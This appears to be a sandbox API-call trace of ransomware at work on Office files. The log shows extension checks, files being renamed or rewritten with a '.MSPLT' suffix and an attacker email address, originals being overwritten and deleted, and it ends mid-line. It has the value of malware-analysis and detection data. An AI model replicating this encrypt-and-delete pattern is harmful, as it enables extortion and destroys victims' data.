lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.584] lstrlenW (lpString=".zip") returned 4 [0183.584] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.584] lstrlenW (lpString=".rar") returned 4 [0183.584] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.584] lstrlenW (lpString=".bz2") returned 4 [0183.584] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.584] lstrlenW (lpString=".7z") returned 3 [0183.584] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.584] lstrlenW (lpString=".dbf") returned 4 [0183.584] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.585] lstrlenW (lpString=".1cd") returned 4 [0183.585] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0183.585] lstrlenW (lpString=".jpg") returned 4 [0183.585] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.585] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.585] lstrlenW (lpString="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 53 [0183.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0183.585] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=3375) returned 1 [0183.585] CloseHandle (hObject=0x2e8) returned 1 [0183.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml")) returned 0x220 [0183.586] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0183.586] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0183.586] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0183.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0183.587] GetLastError () returned 0x0 [0183.587] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xd2f, lpOverlapped=0x0) returned 1 [0183.589] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xd30, lpOverlapped=0x0) returned 1 [0183.590] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0183.590] WriteFile (in: hFile=0x368, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x13e, lpOverlapped=0x0) returned 1 [0183.590] SetEndOfFile (hFile=0x368) returned 1 [0183.590] CloseHandle (hObject=0x368) returned 1 [0183.592] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0183.592] SetEndOfFile (hFile=0x2e8) returned 1 [0183.593] CloseHandle (hObject=0x2e8) returned 1 [0183.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0183.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml")) returned 1 [0183.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.594] lstrlenW (lpString=".doc") returned 4 [0183.594] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.594] lstrlenW (lpString=".docx") returned 5 [0183.594] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.594] lstrlenW (lpString=".pdf") returned 4 [0183.594] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.594] lstrlenW (lpString=".xls") returned 4 [0183.594] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.594] lstrlenW (lpString=".xlsx") returned 5 [0183.594] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.594] lstrlenW (lpString=".ppt") returned 4 [0183.594] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.594] lstrlenW (lpString=".zip") returned 4 [0183.595] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.595] lstrlenW (lpString=".rar") returned 4 [0183.595] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.595] lstrlenW (lpString=".bz2") returned 4 [0183.595] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.595] lstrlenW (lpString=".7z") returned 3 [0183.595] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.595] lstrlenW (lpString=".dbf") returned 4 [0183.595] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.595] lstrlenW (lpString=".1cd") returned 4 [0183.595] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.595] lstrlenW (lpString=".jpg") returned 4 [0183.595] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.595] lstrlenW (lpString=".doc") returned 4 [0183.595] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0183.595] lstrlenW (lpString=".docx") returned 5 [0183.595] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0183.595] lstrlenW (lpString=".pdf") returned 4 [0183.595] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0183.595] lstrlenW (lpString=".xls") returned 4 [0183.595] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0183.595] lstrlenW (lpString=".xlsx") returned 5 [0183.596] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0183.596] lstrlenW (lpString=".ppt") returned 4 [0183.596] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0183.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.596] lstrlenW (lpString=".zip") returned 4 [0183.596] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0183.596] lstrlenW (lpString=".rar") returned 4 [0183.596] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0183.596] lstrlenW (lpString=".bz2") returned 4 [0183.596] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0183.596] lstrlenW (lpString=".7z") returned 3 [0183.596] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0183.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.596] lstrlenW (lpString=".dbf") returned 4 [0183.596] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0183.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.596] lstrlenW (lpString=".1cd") returned 4 [0183.596] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 104 [0183.596] lstrlenW (lpString=".jpg") returned 4 [0183.596] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.596] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.596] lstrlenW (lpString="AppXManifest.common.xml") returned 23 [0183.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0183.597] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=2173046) returned 1 [0183.597] CloseHandle (hObject=0x2e8) returned 1 [0183.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml")) returned 0x220 [0183.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.602] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0183.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0183.603] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afc64 | out: lpNewFilePointer=0x0) returned 1 [0183.603] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afc24 | out: lpNewFilePointer=0x0) returned 1 [0183.603] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x29afc30, lpOverlapped=0x0 | out: lpBuffer=0x2eb8058*, lpNumberOfBytesRead=0x29afc30*=0x40000, lpOverlapped=0x0) returned 1 [0184.039] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0xb0d7c, lpNewFilePointer=0x0, dwMoveMethod=0x29afc24 | out: lpNewFilePointer=0x0) returned 1 [0184.040] ReadFile (in: hFile=0x2e8, lpBuffer=0x2ef8058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x29afc30, lpOverlapped=0x0 | out: lpBuffer=0x2ef8058*, lpNumberOfBytesRead=0x29afc30*=0x40000, lpOverlapped=0x0) returned 1 [0184.047] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x29afc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0184.047] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x1d2876, lpNewFilePointer=0x0, dwMoveMethod=0x29afc24 | out: lpNewFilePointer=0x0) returned 1 [0184.047] ReadFile (in: hFile=0x2e8, lpBuffer=0x2f38058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x29afc30, lpOverlapped=0x0 | out: lpBuffer=0x2f38058*, lpNumberOfBytesRead=0x29afc30*=0x40000, lpOverlapped=0x0) returned 1 [0184.386] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0184.386] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xc011a, lpNumberOfBytesWritten=0x29afca8, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afca8*=0xc011a, lpOverlapped=0x0) returned 1 [0184.402] SetEndOfFile (hFile=0x2e8) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3ff82b8 [0184.408] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afc74 | out: lpNewFilePointer=0x0) returned 1 [0184.408] WriteFile (in: hFile=0x2e8, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x29afc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x29afc80*=0x40000, lpOverlapped=0x0) returned 1 [0184.410] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0xb0d7c, lpNewFilePointer=0x0, dwMoveMethod=0x29afc74 | out: lpNewFilePointer=0x0) returned 1 [0184.410] WriteFile (in: hFile=0x2e8, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x29afc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x29afc80*=0x40000, lpOverlapped=0x0) returned 1 [0184.413] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x1d2876, lpNewFilePointer=0x0, dwMoveMethod=0x29afc74 | out: lpNewFilePointer=0x0) returned 1 [0184.413] WriteFile (in: hFile=0x2e8, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x29afc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x29afc80*=0x40000, lpOverlapped=0x0) returned 1 [0184.462] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ff82b8 | out: hHeap=0x710000) returned 1 [0185.385] CloseHandle (hObject=0x2e8) returned 1 [0186.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.465] lstrlenW (lpString=".doc") returned 4 [0186.465] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0186.465] lstrlenW (lpString=".docx") returned 5 [0186.465] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0186.465] lstrlenW (lpString=".pdf") returned 4 [0186.465] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0186.465] lstrlenW (lpString=".xls") returned 4 [0186.465] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0186.465] lstrlenW (lpString=".xlsx") returned 5 [0186.465] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0186.465] lstrlenW (lpString=".ppt") returned 4 [0186.465] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0186.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.465] lstrlenW (lpString=".zip") returned 4 [0186.465] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0186.465] lstrlenW (lpString=".rar") returned 4 [0186.465] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0186.465] lstrlenW (lpString=".bz2") returned 4 [0186.465] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0186.466] lstrlenW (lpString=".7z") returned 3 [0186.466] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0186.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.466] lstrlenW (lpString=".dbf") returned 4 [0186.466] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0186.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.466] lstrlenW (lpString=".1cd") returned 4 [0186.466] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0186.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.466] lstrlenW (lpString=".jpg") returned 4 [0186.466] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0186.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.466] lstrlenW (lpString=".doc") returned 4 [0186.466] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0186.466] lstrlenW (lpString=".docx") returned 5 [0186.466] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0186.466] lstrlenW (lpString=".pdf") returned 4 [0186.466] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0186.466] lstrlenW (lpString=".xls") returned 4 [0186.466] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0186.466] lstrlenW (lpString=".xlsx") returned 5 [0186.466] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0186.466] lstrlenW (lpString=".ppt") returned 4 [0186.466] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0186.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.466] lstrlenW (lpString=".zip") returned 4 [0186.467] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0186.467] lstrlenW (lpString=".rar") returned 4 [0186.467] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0186.467] lstrlenW (lpString=".bz2") returned 4 [0186.467] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0186.467] lstrlenW (lpString=".7z") returned 3 [0186.467] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0186.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.467] lstrlenW (lpString=".dbf") returned 4 [0186.467] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0186.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.467] lstrlenW (lpString=".1cd") returned 4 [0186.467] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0186.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0186.467] lstrlenW (lpString=".jpg") returned 4 [0186.467] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0186.467] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.467] lstrlenW (lpString="AG00161_.GIF") returned 12 [0186.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0186.469] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=7583) returned 1 [0186.469] CloseHandle (hObject=0x2e8) returned 1 [0186.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif")) returned 0x220 [0186.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0186.471] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.471] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0186.471] GetLastError () returned 0x0 [0186.471] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x1d9f, lpOverlapped=0x0) returned 1 [0186.550] WriteFile (in: hFile=0x398, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x1da0, lpOverlapped=0x0) returned 1 [0186.551] ReadFile (in: hFile=0x2e8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0186.551] WriteFile (in: hFile=0x398, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xec, lpOverlapped=0x0) returned 1 [0186.551] SetEndOfFile (hFile=0x398) returned 1 [0186.552] CloseHandle (hObject=0x398) returned 1 [0186.554] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0186.554] SetEndOfFile (hFile=0x2e8) returned 1 [0186.555] CloseHandle (hObject=0x2e8) returned 1 [0186.555] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.555] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0186.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.556] lstrlenW (lpString=".doc") returned 4 [0186.556] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.556] lstrlenW (lpString=".docx") returned 5 [0186.556] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.556] lstrlenW (lpString=".pdf") returned 4 [0186.556] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.556] lstrlenW (lpString=".xls") returned 4 [0186.556] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.556] lstrlenW (lpString=".xlsx") returned 5 [0186.556] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.556] lstrlenW (lpString=".ppt") returned 4 [0186.556] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0186.556] lstrlenW (lpString=".zip") returned 4 [0186.556] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.556] lstrlenW (lpString=".rar") returned 4 [0186.556] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.556] lstrlenW (lpString=".bz2") returned 4 [0186.556] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") 